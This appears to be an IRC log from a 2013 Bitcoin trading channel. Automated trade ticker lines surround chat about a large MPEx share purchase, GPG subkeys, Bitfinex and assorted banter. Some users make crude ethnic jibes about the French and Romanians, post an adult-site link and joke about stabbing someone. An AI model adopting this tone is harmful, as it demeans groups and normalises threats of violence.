[-] Jun 20 20:50:40 [HAVELOCK] [ASICM] 3 @ 0.02889 = 0.0867 BTC [+] Jun 20 20:52:14 [HAVELOCK] [HIM] 1 @ 0.279 BTC [+] Jun 20 20:52:40 [BTCTC] [DMS.PURCHASE] 10 @ 0.054412 = 0.5441 BTC [-] Jun 20 20:56:07 [BTCTC] [BITVPS] 1 @ 0.00131 BTC [-] Jun 20 21:01:39 [MPEX] [S.MPOE] 12435 @ 0.00069899 = 8.6919 BTC [+] Jun 20 21:01:41 [MPEX] [S.MPOE] 36510 @ 0.00069986 = 25.5519 BTC [+] Jun 20 21:01:43 [MPEX] [S.MPOE] 2000 @ 0.00070142 = 1.4028 BTC [+] Jun 20 21:01:45 [BTCTC] [GSDPT] 1 @ 0.002587 BTC [+] Jun 20 21:01:58 [MPEX] [S.MPOE] 11200 @ 0.00070155 = 7.8574 BTC [+] Jun 20 21:02:00 [MPEX] [S.MPOE] 100 @ 0.00071586 = 0.0716 BTC [+] Jun 20 21:02:06 [MPEX] [S.MPOE] 5568 @ 0.00072629 = 4.044 BTC [+] Jun 20 21:02:12 [MPEX] [S.MPOE] 8000 @ 0.00073564 = 5.8851 BTC [+] Jun 20 21:02:13 [MPEX] [S.MPOE] 12000 @ 0.00074 = 8.88 BTC [+] Jun 20 21:02:29 [MPEX] [S.MPOE] 100 @ 0.0007652 = 0.0765 BTC [+] Jun 20 21:02:31 [MPEX] [S.MPOE] 2944 @ 0.00076528 = 2.253 BTC [+] Jun 20 21:03:28 [MPEX] [S.MPOE] 50000000 @ 0.0007725 = 38625 BTC [+] Jun 20 21:05:01 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [-] Jun 20 21:05:25 38625 BTC :o Jun 20 21:05:36 statement soon. Jun 20 21:06:59 @assbot | [MPEX] [S.MPOE] 50000000 @ 0.0007725 = 38625 BTC [+] Jun 20 21:07:01 wat Jun 20 21:09:40 Scrat is that for reals? Jun 20 21:12:15 [BTCTC] [ASICMINER-PT] 2 @ 2.849 = 5.698 BTC [-] Jun 20 21:13:48 [BTCTC] [DMS.SELLING] 20 @ 0.037699 = 0.754 BTC [+] Jun 20 21:16:47 [BTCTC] [S.MPOE-PT] 142 @ 0.0007 = 0.0994 BTC [+] Jun 20 21:18:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.028787 BTC [+] Jun 20 21:18:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02879 = 0.1152 BTC [+] Jun 20 21:18:36 [BTCTC] [TAT.ASICMINER] 78 @ 0.0289 = 2.2542 BTC [+] Jun 20 21:19:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0285 BTC [-] Jun 20 21:21:00 [HAVELOCK] [ASICM] 56 @ 0.02889 = 1.6178 BTC [+] Jun 20 21:21:18 [HAVELOCK] [ASICM] 64 @ 0.02889 = 1.849 BTC [+] Jun 20 21:22:19 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 20 21:22:57 [BTCTC] [ASICMINER-PT] 3 @ 2.835 = 8.505 BTC [-] Jun 20 21:30:38 saulimus Scrat qxzn http://trilema.com/2013/smpoe-takes-strategic-investor/ there you go Jun 20 21:34:02 [BTCTC] [TAT.ASICMINER] 50 @ 0.028899 = 1.445 BTC [+] Jun 20 21:34:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [+] Jun 20 21:36:22 S.MPOE go home, you're drunk Jun 20 21:36:43 MP, congrats to you . Excellent job and well- excellent job Jun 20 21:36:48 yee Jun 20 21:36:49 tyty Jun 20 21:36:54 what happened? Jun 20 21:37:28 MP's hard work paid off bigtime for all of Bitcoin actulally Jun 20 21:37:33 actually Jun 20 21:37:42 he got prostitutes to accept bitcoins? Jun 20 21:37:50 they already did Jun 20 21:37:56 you just did not ask right Jun 20 21:38:22 lol DiabloD3 actually, there's a shocker re the bitcoin girls in the pipeline Jun 20 21:38:24 mebbe next month Jun 20 21:41:06 [BTCTC] [ASICMINER-PT] 4 @ 2.83 = 11.32 BTC [-] Jun 20 21:43:16 mircea_popescu: nice job Jun 20 21:43:34 [BTCTC] [RSM] 10 @ 0.0295 = 0.295 BTC [+] Jun 20 21:46:25 [BTCTC] [DMS.MINING] 4 @ 0.017986 = 0.0719 BTC [-] Jun 20 21:47:50 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 20 21:48:13 38625 BTC for 5% of MPEx? Impressive. Jun 20 21:48:30 [BTCTC] [BASIC-MINING] 1 @ 1.319989 BTC [+] Jun 20 21:48:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.028889 BTC [-] Jun 20 21:49:25 [BTCTC] [BASIC-MINING] 1 @ 1.319989 BTC [+] Jun 20 21:51:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.028889 = 0.2022 BTC [-] Jun 20 21:52:36 [BTCTC] [BASIC-MINING] 1 @ 1.31999 BTC [+] Jun 20 21:52:37 [BTCTC] [S.MPOE-PT] 943 @ 0.000703 = 0.6629 BTC [+] Jun 20 21:52:39 [BTCTC] [S.MPOE-PT] 313 @ 0.000705 = 0.2207 BTC [+] Jun 20 21:52:41 [BTCTC] [S.MPOE-PT] 2000 @ 0.000709 = 1.418 BTC [+] Jun 20 21:52:45 [BTCTC] [S.MPOE-PT] 1927 @ 0.00071 = 1.3682 BTC [+] Jun 20 21:52:47 [BTCTC] [S.MPOE-PT] 123 @ 0.000719 = 0.0884 BTC [+] Jun 20 21:52:48 [BTCTC] [S.MPOE-PT] 10 @ 0.000725 = 0.0073 BTC [+] Jun 20 21:52:49 [BTCTC] [S.MPOE-PT] 749 @ 0.000725 = 0.543 BTC [+] Jun 20 21:52:51 [BTCTC] [S.MPOE-PT] 721 @ 0.000727 = 0.5242 BTC [+] Jun 20 21:52:51 [BTCTC] [S.MPOE-PT] 1000 @ 0.00073 = 0.73 BTC [+] Jun 20 21:52:58 [BTCTC] [S.MPOE-PT] 34 @ 0.00073 = 0.0248 BTC [+] Jun 20 21:53:00 [BTCTC] [S.MPOE-PT] 85 @ 0.000736 = 0.0626 BTC [+] Jun 20 21:53:01 [BTCTC] [S.MPOE-PT] 1500 @ 0.000737 = 1.1055 BTC [+] Jun 20 21:53:02 [BTCTC] [S.MPOE-PT] 595 @ 0.00074 = 0.4403 BTC [+] Jun 20 21:53:13 [MPEX] [S.MPOE] 11150 @ 0.00077339 = 8.6233 BTC [+] Jun 20 21:53:17 mircea_popescu: isn't there a haters thread already somewhere ? :) Jun 20 21:53:43 [BTCTC] [BASIC-MINING] 1 @ 1.319989 BTC [-] Jun 20 21:53:44 [BTCTC] [BASIC-MINING] 5 @ 1.32 = 6.6 BTC [+] Jun 20 21:53:46 [BTCTC] [BASIC-MINING] 2 @ 1.32 = 2.64 BTC [+] Jun 20 21:54:22 [BTCTC] [S.MPOE-PT] 200 @ 0.00074 = 0.148 BTC [+] Jun 20 21:54:24 [BTCTC] [S.MPOE-PT] 75 @ 0.000746 = 0.056 BTC [+] Jun 20 21:54:24 [BTCTC] [S.MPOE-PT] 16 @ 0.000747 = 0.012 BTC [+] Jun 20 21:54:25 [BTCTC] [S.MPOE-PT] 1000 @ 0.00075 = 0.75 BTC [+] Jun 20 21:54:26 [BTCTC] [S.MPOE-PT] 39 @ 0.00075 = 0.0293 BTC [+] Jun 20 21:54:51 [MPEX] [S.MPOE] 1250 @ 0.00077339 = 0.9667 BTC [+] Jun 20 21:54:53 [MPEX] [S.MPOE] 80 @ 0.0007725 = 0.0618 BTC [-] Jun 20 21:55:04 [HAVELOCK] [ASICM] 3 @ 0.02860002 = 0.0858 BTC [-] Jun 20 21:55:24 darkee i imagien there must be. Jun 20 21:55:26 [HAVELOCK] [ASICM] 1 @ 0.02860001 BTC [-] Jun 20 21:55:43 absolutely ;) Jun 20 21:56:59 wow Jun 20 21:57:24 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 20 21:57:25 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 20 21:59:31 all the most bitcoin fun happens outside of the us Jun 20 21:59:37 this bodes well for my travels Jun 20 22:01:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.0288 = 0.0576 BTC [-] Jun 20 22:01:31 i see some nice pt arbitraging going on lol Jun 20 22:01:40 no shit Jun 20 22:03:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0285 = 0.0855 BTC [-] Jun 20 22:04:59 [MPEX] [S.MPOE] 10944 @ 0.00077441 = 8.4751 BTC [+] Jun 20 22:05:41 [MPEX] [S.MPOE] 70000 @ 0.0007725 = 54.075 BTC [-] Jun 20 22:06:26 [BTCTC] [ASICMINER-PT] 2 @ 2.847 = 5.694 BTC [+] Jun 20 22:06:30 [MPEX] [S.MPOE] 4503 @ 0.0007725 = 3.4786 BTC [-] Jun 20 22:07:04 [BTCTC] [S.MPOE-PT] 2 @ 0.00078 = 0.0016 BTC [+] Jun 20 22:07:25 !t btctc s.mpoe-pt Jun 20 22:07:27 [BTCT:S.MPOE-PT] 1D: 0.000699 / 0.00072 / 0.00078 (11511 shares, 8.3 BTC), 7D: 0.000641 / 0.00072 / 0.00078 (12105 shares, 8.7 BTC), 30D: 0.000635 / 0.00071 / 0.00078 (37141 shares, 26.4 BTC) Jun 20 22:07:36 so 10 btc alligned it. Jun 20 22:07:47 [BTCTC] [ASICMINER-PT] 1 @ 2.848 BTC [+] Jun 20 22:08:27 [BTCTC] [RSM] 1 @ 0.0295 BTC [+] Jun 20 22:08:41 mircea_popescu: quick question, does mpex work with gpg subkeys? Jun 20 22:09:02 nope, it just uses one fingerprint and that's it. Jun 20 22:10:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.0282 = 0.141 BTC [-] Jun 20 22:10:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.0281 = 0.1124 BTC [-] Jun 20 22:10:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.02801 = 0.084 BTC [-] Jun 20 22:10:34 [BTCTC] [ASICMINER-PT] 7 @ 2.85 = 19.95 BTC [+] Jun 20 22:10:34 [BTCTC] [TAT.ASICMINER] 18 @ 0.028002 = 0.504 BTC [-] Jun 20 22:10:49 [BTCTC] [DMS.MINING] 1 @ 0.017987 BTC [+] Jun 20 22:12:12 [BTCTC] [TAT.ASICMINER] 14 @ 0.0284 = 0.3976 BTC [+] Jun 20 22:12:52 might be an interesting addition, as, if i understand subkeys correctly they make the master key very very hard to compromise Jun 20 22:13:25 but if you don't use tghe master key it doesn't matter if it's jhard to compromise Jun 20 22:13:26 [BTCTC] [BASIC-MINING] 1 @ 1.32 BTC [+] Jun 20 22:13:27 [BTCTC] [TAT.ASICMINER] 23 @ 0.0284 = 0.6532 BTC [+] Jun 20 22:13:30 as the subkeys are now the target. Jun 20 22:14:02 [BTCTC] [BASIC-MINING] 3 @ 1.33 = 3.99 BTC [+] Jun 20 22:14:10 i was imagining something around the lines of "register your master key, any subkey signed by the master key counts as the master key itself" Jun 20 22:14:38 but i guess if you compromise a subkey you still have a few options to do nasty things anyway Jun 20 22:14:49 until it's revoked Jun 20 22:15:03 ugh, i guess it introduces more problems than it actually solves Jun 20 22:15:08 exactly. Jun 20 22:15:22 a very simple design is usually safer than an apparenlty safer but more complex design Jun 20 22:15:43 since you now have to handle revocation as well Jun 20 22:15:49 davout, is there any more precise information for the relaunch of bitcoin-central ? Jun 20 22:16:15 jimmy2k: yes, whether i will share it with you is a whole other story Jun 20 22:16:51 [BTCTC] [DMS.SELLING] 24 @ 0.0378 = 0.9072 BTC [+] Jun 20 22:16:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.02888 = 0.0578 BTC [+] Jun 20 22:17:01 jimmy2k: we're reopening, optimistic timeframe is mid july, pessimistic is beginning of september Jun 20 22:17:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.02888 = 0.2888 BTC [+] Jun 20 22:17:13 no wai ?! Jun 20 22:17:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.02888 = 0.1155 BTC [+] Jun 20 22:17:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02888 BTC [+] Jun 20 22:19:50 unrelatedly, http://girls.twistys.com/preview/dum/062013/06-14-2013/breabennett/photos/16.jpg Jun 20 22:19:53 [BTCTC] [S.MPOE-PT] 1 @ 0.00078 BTC [+] Jun 20 22:20:21 nice stair carpet Jun 20 22:20:44 it's a bear. Jun 20 22:20:44 [BTCTC] [DMS.MINING] 5 @ 0.017987 = 0.0899 BTC [+] Jun 20 22:20:53 well her name is brea, but anyway Jun 20 22:20:56 [BTCTC] [BASIC-MINING] 8 @ 1.329 = 10.632 BTC [-] Jun 20 22:21:51 i like french people. they're cultured and make obscure puns feasible. Jun 20 22:22:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.028879 BTC [-] Jun 20 22:22:59 i like romanians, they'll sell you their kid if you're infertile and can't be fucked to jump through the adoption bureaucratic hoops Jun 20 22:23:21 [BTCTC] [BITVPS] 5 @ 0.001689 = 0.0084 BTC [+] Jun 20 22:23:42 davout: more likely send you their neighbor's kid Jun 20 22:24:29 aknap3: there's actually a story like that these days in the french news Jun 20 22:24:29 or some kidnapped french girl. Jun 20 22:24:59 yea, that works too, but it's usually daddy that pushes it Jun 20 22:25:04 but anyway : if you didn't buttfuck frogs all day you wouldn't be infertile to begin with. Jun 20 22:25:27 :-) Jun 20 22:25:44 i was wondering about something Jun 20 22:25:49 mpoe-pr got a paste. her response ? "the french may have invented sauce, but it's pretty weak" Jun 20 22:26:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.028879 BTC [-] Jun 20 22:26:26 [HAVELOCK] [ASICM] 11 @ 0.02860001 = 0.3146 BTC [-] Jun 20 22:26:43 what does that mean "she got a paste" ? Jun 20 22:27:03 we recently had this thing in france where everybody was shocked to learn that lots of the lasagna you'd buy in the store contained horse meat instead of beef Jun 20 22:27:51 o ya ? this reminds me of the case where lots of women were shocked to hear their french boobie inplants contained some sort of piss instead of gel. Jun 20 22:27:58 french compagnie. Jun 20 22:28:11 [BTCTC] [PAJKA.BOND] 2 @ 0.045 = 0.09 BTC [+] Jun 20 22:28:13 romanians were immediately blamed for it and all the newspapers mentioned that horses were recently forbidden on the romanian roads, leading to lots of horses ending up in industrial lasagna Jun 20 22:28:33 any truth to this? did the story make it to romania? Jun 20 22:28:40 just curious Jun 20 22:28:50 it was all over the place here too Jun 20 22:29:01 but stupid people, horse is better than beef Jun 20 22:29:07 yea, i heard about the breast implants thing Jun 20 22:29:25 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.005761 = 0.0173 BTC [+] Jun 20 22:29:25 yup, zero fucks were given, lasagna as delicious as usual Jun 20 22:29:28 [HAVELOCK] [ASICM] 60 @ 0.02860001 = 1.716 BTC [-] Jun 20 22:29:29 [HAVELOCK] [ASICM] 78 @ 0.0286 = 2.2308 BTC [-] Jun 20 22:29:42 davout the story did make it to romania, mostly to consternation. Jun 20 22:29:51 horses have been forbidden on roads in the 1980s Jun 20 22:29:57 Why would you complain about horse meat... Jun 20 22:30:18 and yeah,. horse meat is sold at a premium (esp because romania imports beef, and eats horse) Jun 20 22:30:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [-] Jun 20 22:30:29 [HAVELOCK] [ASICM] 3 @ 0.0285 = 0.0855 BTC [-] Jun 20 22:30:31 Namworld: dunno, like lots of noise for nothing Jun 20 22:30:33 [HAVELOCK] [ASICM] 13 @ 0.0284 = 0.3692 BTC [-] Jun 20 22:30:33 [HAVELOCK] [ASICM] 59 @ 0.02836 = 1.6732 BTC [-] Jun 20 22:30:44 so it's a case of "the japanese have replaced our hambuger meat with tuna". right-o. Jun 20 22:30:48 [HAVELOCK] [ASICM] 7 @ 0.0283525 = 0.1985 BTC [-] Jun 20 22:30:48 [HAVELOCK] [ASICM] 9 @ 0.02834 = 0.2551 BTC [-] Jun 20 22:30:48 [HAVELOCK] [ASICM] 8 @ 0.02831 = 0.2265 BTC [-] Jun 20 22:30:48 [HAVELOCK] [ASICM] 1 @ 0.0283001 BTC [-] Jun 20 22:30:48 [HAVELOCK] [ASICM] 6 @ 0.0283 = 0.1698 BTC [-] Jun 20 22:30:48 [HAVELOCK] [ASICM] 194 @ 0.02801 = 5.4339 BTC [-] Jun 20 22:30:56 o looky! havelock! cool. Jun 20 22:31:01 !t h asicm Jun 20 22:31:01 [BTCTC] [DMS.SELLING] 1 @ 0.0377 BTC [-] Jun 20 22:31:19 [BTCTC] [MININGCO.ETF] 5 @ 0.79 = 3.95 BTC [-] Jun 20 22:31:26 [HAVELOCK:ASICM] 1D: 0.02740000 / 0.0284187 / 0.02899000 (4621 shares, 131.32281302 BTC), 7D: 0.02500000 / 0.02876004 / 0.03250000 (74144 shares, 2132.38459430 BTC), 30D: 0.02110000 / 0.0260608 / 0.03250000 (281999 shares, 7349.12025636 BTC) Jun 20 22:31:31 the funniest part about it is that nobody actually reported lasagna as tasting funny Jun 20 22:31:33 [BTCTC] [TAT.ASICMINER] 35 @ 0.0286 = 1.001 BTC [-] Jun 20 22:31:57 you know... i'd be surprised if store lasagna actually has meat in it. Jun 20 22:32:21 [BTCTC] [S.DICE-PT] 1 @ 0.0026 BTC [+] Jun 20 22:32:47 [BTCTC] [S.DICE-PT] 1 @ 0.0027 BTC [+] Jun 20 22:33:00 true Jun 20 22:33:33 [BTCTC] [DMS.MINING] 1 @ 0.017987 BTC [+] Jun 20 22:33:40 [BTCTC] [DMS.SELLING] 1 @ 0.037 BTC [-] Jun 20 22:33:44 probably as much meat in the lasagna as USD backing MTGUSD, NOBODY KNOWS Jun 20 22:33:49 [BTCTC] [BASIC-MINING] 1 @ 1.33 BTC [+] Jun 20 22:33:51 lol Jun 20 22:34:01 [BTCTC] [S.DICE-PT] 7 @ 0.002719 = 0.019 BTC [+] Jun 20 22:34:03 [BTCTC] [TAT.ASICMINER] 20 @ 0.028879 = 0.5776 BTC [+] Jun 20 22:34:07 [BTCTC] [TAT.ASICMINER] 11 @ 0.028879 = 0.3177 BTC [+] Jun 20 22:34:27 its just horse blood. Jun 20 22:34:27 at this rate gox is going to go under before we even reopen, no fun... Jun 20 22:34:30 [BTCTC] [DMS.PURCHASE] 1 @ 0.054412 BTC [-] Jun 20 22:34:35 btw davout , if you know any hot sexy french draughstwomen, https://bitcointalk.org/index.php?topic=234398.msg2530784#msg2530784 Jun 20 22:34:39 i love blood sausage Jun 20 22:34:56 [BTCTC] [DMS.MINING] 1 @ 0.017999 BTC [+] Jun 20 22:35:42 [BTCTC] [DMS.MINING] 5 @ 0.017999 = 0.09 BTC [+] Jun 20 22:35:42 mircea_popescu: yeah, i saw that thread Jun 20 22:36:16 oh, and btw i'll forever be thankful to romania for introducing me to tripes Jun 20 22:36:34 hehe Jun 20 22:39:49 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [-] Jun 20 22:41:29 [BTCTC] [COGNITIVE] 1 @ 0.302199 BTC [-] Jun 20 22:42:32 [BTCTC] [MININGCO.ETF] 1 @ 0.79 BTC [-] Jun 20 22:46:24 [BTCTC] [S.DICE-PT] 1 @ 0.002719 BTC [+] Jun 20 22:48:07 "There is already a well-funded group developing proprietary gateway software to integrate a BTC economy into several major game platforms. If you are still at the stage of raising capital you have probably already missed the boat." Jun 20 22:48:11 lol teh forum peeps. Jun 20 22:49:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02888 BTC [+] Jun 20 22:49:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.02888 = 0.0578 BTC [+] Jun 20 22:49:51 [BTCTC] [TAT.ASICMINER] 13 @ 0.02888 = 0.3754 BTC [+] Jun 20 22:50:04 because there is only room for one game company? Jun 20 22:50:07 s/proprietary gateway software/a perl wrapper for the bitcoin client/ Jun 20 22:50:17 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [+] Jun 20 22:51:49 because kids today. Jun 20 22:52:09 davout shush you. well founded group, does not know who mpoe-pr is. ftw. Jun 20 22:52:23 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 20 22:53:45 [BTCTC] [DMS.MINING] 1 @ 0.017999 BTC [+] Jun 20 22:55:12 [BTCTC] [BITVPS] 10 @ 0.001241 = 0.0124 BTC [-] Jun 20 22:55:32 [BTCTC] [BASIC-MINING] 5 @ 1.33 = 6.65 BTC [+] Jun 20 22:57:49 Uh, BITVPS is going back up, isn't it? Jun 20 22:57:54 [BTCTC] [BASIC-MINING] 1 @ 1.33 BTC [+] Jun 20 22:58:32 BITVPS spiked quite a bit today Jun 20 22:59:08 is there some good news on BTVPS, or is somebody pump-and-dumping? Jun 20 22:59:49 only news that they might become profitable Jun 20 22:59:53 but that was days ago Jun 20 23:02:07 [BTCTC] [BASIC-MINING] 1 @ 1.3799 BTC [+] Jun 20 23:02:10 [BTCTC] [BASIC-MINING] 1 @ 1.38 BTC [+] Jun 20 23:02:13 [BTCTC] [BASIC-MINING] 12 @ 1.38999 = 16.6799 BTC [+] Jun 20 23:02:19 [BTCTC] [BASIC-MINING] 10 @ 1.39 = 13.9 BTC [+] Jun 20 23:03:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.02889 = 0.2889 BTC [+] Jun 20 23:03:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.02889 = 0.2889 BTC [+] Jun 20 23:05:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005203 BTC [-] Jun 20 23:05:54 [HAVELOCK] [ASICM] 1 @ 0.0287 BTC [+] Jun 20 23:06:20 [HAVELOCK] [ASICM] 34 @ 0.0287 = 0.9758 BTC [+] Jun 20 23:06:41 [BTCTC] [S.MPOE-PT] 156 @ 0.00077 = 0.1201 BTC [-] Jun 20 23:07:03 [BTCTC] [PAJKA.BOND] 1 @ 0.044 BTC [-] Jun 20 23:07:05 [BTCTC] [PAJKA.BOND] 1 @ 0.04301 BTC [-] Jun 20 23:07:06 [BTCTC] [PAJKA.BOND] 8 @ 0.042 = 0.336 BTC [-] Jun 20 23:09:29 [BTCTC] [ASICMINER-PT] 1 @ 2.866 BTC [+] Jun 20 23:09:31 http://i.imgur.com/Qo68s1C.jpg Jun 20 23:10:00 [HAVELOCK] [ASICM] 65 @ 0.0287 = 1.8655 BTC [+] Jun 20 23:10:11 MG SimCity edition cover? Jun 20 23:10:46 [BTCTC] [BASIC-MINING] 4 @ 1.4 = 5.6 BTC [+] Jun 20 23:11:21 [BTCTC] [ASICMINER-PT] 3 @ 2.867 = 8.601 BTC [+] Jun 20 23:11:47 that's mizuho bank Jun 20 23:11:49 [BTCTC] [ASICMINER-PT] 6 @ 2.868 = 17.208 BTC [+] Jun 20 23:11:55 [BTCTC] [S.DICE-PT] 10 @ 0.002501 = 0.025 BTC [-] Jun 20 23:12:05 mtgox' success' most recent victim Jun 20 23:12:18 lol Jun 20 23:12:23 [BTCTC] [S.MPOE-PT] 10 @ 0.00066 = 0.0066 BTC [-] Jun 20 23:13:21 [BTCTC] [DMS.SELLING] 13 @ 0.0377 = 0.4901 BTC [+] Jun 20 23:13:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02888 BTC [-] Jun 20 23:14:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.02888 = 0.0578 BTC [-] Jun 20 23:14:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.02888 = 0.0578 BTC [-] Jun 20 23:17:17 [BTCTC] [DMS.MINING] 1 @ 0.017999 BTC [+] Jun 20 23:17:26 [BTCTC] [TAT.ASICMINER] 9 @ 0.02889 = 0.26 BTC [+] Jun 20 23:18:01 [BTCTC] [DMS.MINING] 1 @ 0.017999 BTC [+] Jun 20 23:19:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.02889 = 0.0578 BTC [+] Jun 20 23:19:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.02888 = 0.1733 BTC [-] Jun 20 23:20:20 !ticker btctc btvps Jun 20 23:20:25 It's so strange that you don't remember any of your poetry. Jun 20 23:20:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.02888 = 0.5776 BTC [-] Jun 20 23:20:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.028421 = 0.5684 BTC [-] Jun 20 23:20:32 [BTCTC] [TAT.ASICMINER] 30 @ 0.02842 = 0.8526 BTC [-] Jun 20 23:20:36 !ticker btctc bitvps Jun 20 23:20:37 [BTCT:BITVPS] 1D: 0.000702 / 0.00097 / 0.0017 (6455 shares, 6.3 BTC), 7D: 0.000668 / 0.00087 / 0.0017 (10318 shares, 9 BTC), 30D: 0.00036 / 0.00071 / 0.0017 (63170 shares, 44.7 BTC) Jun 20 23:20:52 [BTCTC] [MININGCO.ETF] 1 @ 0.79 BTC [-] Jun 20 23:21:39 [BTCTC] [TAT.ASICMINER] 35 @ 0.02889 = 1.0112 BTC [+] Jun 20 23:22:43 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199997 = 0.4 BTC [+] Jun 20 23:22:50 [BTCTC] [BASIC-MINING] 1 @ 1.33 BTC [-] Jun 20 23:24:21 [BTCTC] [BASIC-MINING] 1 @ 1.399 BTC [+] Jun 20 23:24:31 mircea_popescu: you around? Jun 20 23:24:33 ;;seen mircea_popescu Jun 20 23:24:43 ;;gribble Jun 20 23:25:16 ;;ticker Jun 20 23:25:21 [BTCTC] [BITVPS] 1 @ 0.00124 BTC [-] Jun 20 23:25:35 he was here less than 10 minutes ago Jun 20 23:30:16 yea Jun 20 23:30:48 i was preparing a nice flower arrangement for the mizuho funeral Jun 20 23:30:51 what's up ? Jun 20 23:34:44 bank looks a bit like one in jax http://en.wikipedia.org/wiki/Wells_Fargo_Center_(Jacksonville) Jun 20 23:35:55 i think the same five people make all the bank buildings Jun 20 23:36:00 [BTCTC] [ASICMINER-PT] 1 @ 2.866 BTC [-] Jun 20 23:36:05 anf they'vbe last had an idea in 1986 Jun 20 23:36:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.028799 = 0.1728 BTC [-] Jun 20 23:38:30 "Why did flexcoin fail?" it did ? Jun 20 23:38:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00574 BTC [+] Jun 20 23:39:02 there is clearly not enough drama yet, all the forum threads i follow seem to be a dozen guys painfully obsessing over things they have no influence over Jun 20 23:39:24 [MPEX] [S.MPOE] 6209 @ 0.00077392 = 4.8053 BTC [+] Jun 20 23:41:12 mircea_popescu: probably because roger wehbe is an idiot Jun 20 23:41:36 is this the thing with lose your coins if you hold them ? Jun 20 23:41:44 [BTCTC] [BASIC-MINING] 1 @ 1.399 BTC [+] Jun 20 23:41:55 that would be easywallet Jun 20 23:42:10 [BTCTC] [BASIC-MINING] 2 @ 1.4 = 2.8 BTC [+] Jun 20 23:42:34 lol Jun 20 23:42:45 no, iirc some guy had the idea of making a diff coin where all balances lose whatever % Jun 20 23:42:52 ooh Jun 20 23:42:58 isn't that terracoin? Jun 20 23:43:08 the coin with demurrage or whatever? Jun 20 23:43:08 isnt that just any altcoin Jun 20 23:43:38 yeah. well flexcoin is also an alt no ? Jun 20 23:43:42 flexcoin is, wait or it... the first bitcoin bank Jun 20 23:43:46 "Dear Customers Jun 20 23:43:46 We have now commenced with all the preliminary paperwork in order to become a fully licensed money transmitter in Hong Kong. Jun 20 23:43:46 During the application period and until final launch this requires us to stop receiving incoming wires during this time with immediate effect." Jun 20 23:43:46 lol, Jun 20 23:43:49 bitfinex is such a copycat Jun 20 23:43:52 i don't think flexcoin is an alt Jun 20 23:43:52 [BTCTC] [MININGCO.ETF] 1 @ 0.8 BTC [+] Jun 20 23:43:53 [BTCTC] [BASIC-MINING] 2 @ 1.4 = 2.8 BTC [+] Jun 20 23:43:55 trying to capitalize on mtgox success Jun 20 23:44:14 LOL Jun 20 23:44:15 this client i have is asking me, Jun 20 23:44:26 if i can put an email signup form in their email newsletter Jun 20 23:44:29 uhhhh Jun 20 23:44:52 ThickAsThieves if i find out you're working for those asic technologies idiots i will find you and stab you in the testicles. Jun 20 23:45:27 no, worse, a marketing company Jun 20 23:45:28 ThickAsThieves: http://theoatmeal.com/comics/design_hell Jun 20 23:45:44 you should put a signup form in their signup form Jun 20 23:45:55 does email even support forms? Jun 20 23:46:13 that's like asking if a cooking pan supports tea Jun 20 23:46:13 i dont think ive ever seen that Jun 20 23:46:23 before bitfinex declares they are the most advance in the world, they need to work on they main page Jun 20 23:46:24 you should be able to do it Jun 20 23:46:33 it looks like a 6 year old did it Jun 20 23:47:33 jborkl_: you're not being very nice to six years olds Jun 20 23:47:37 lol Jun 20 23:47:43 for the record, a 17yo did it. Jun 20 23:48:02 davout, that comic is why i'm getting out of this game Jun 20 23:48:03 he was a chinese studying ancient artefacts in new zealand Jun 20 23:48:04 or such Jun 20 23:48:17 about 15% of my work is something i can be proud of Jun 20 23:48:21 the peach colored border is awful Jun 20 23:48:32 ok you guys are making me look it up now. Jun 20 23:48:38 and I have to essentially psychologically manipulate the clients to get that 15% Jun 20 23:48:40 my 4 year old made me a painted egg-holder for father's day, i think she can give these guys a design lesson Jun 20 23:49:04 o look, i loaded up a twinkie! Jun 20 23:49:07 Well, MP they say they have you beat Jun 20 23:49:21 Bitfinex is the most advanced financial place in the Bitcoin world Jun 20 23:49:27 boom Jun 20 23:49:33 lol nah, i'd rather neutral than ugly Jun 20 23:49:34 jborkl_ are these the well funded group or o no wait, different people. Jun 20 23:49:37 design-wise Jun 20 23:49:56 people put money into bitfinex? Jun 20 23:50:08 I have not heard of it before today Jun 20 23:50:08 every twinkie needs its cream i guess Jun 20 23:50:27 We pride ourselves in having the most secure platform in the bitcoin world, and here is why: Jun 20 23:50:29 ahahaha ok. Jun 20 23:50:36 I am not cool though Jun 20 23:50:37 "Nobody went broke taking profits! - Beta" Jun 20 23:50:47 their slogan is in Beta Jun 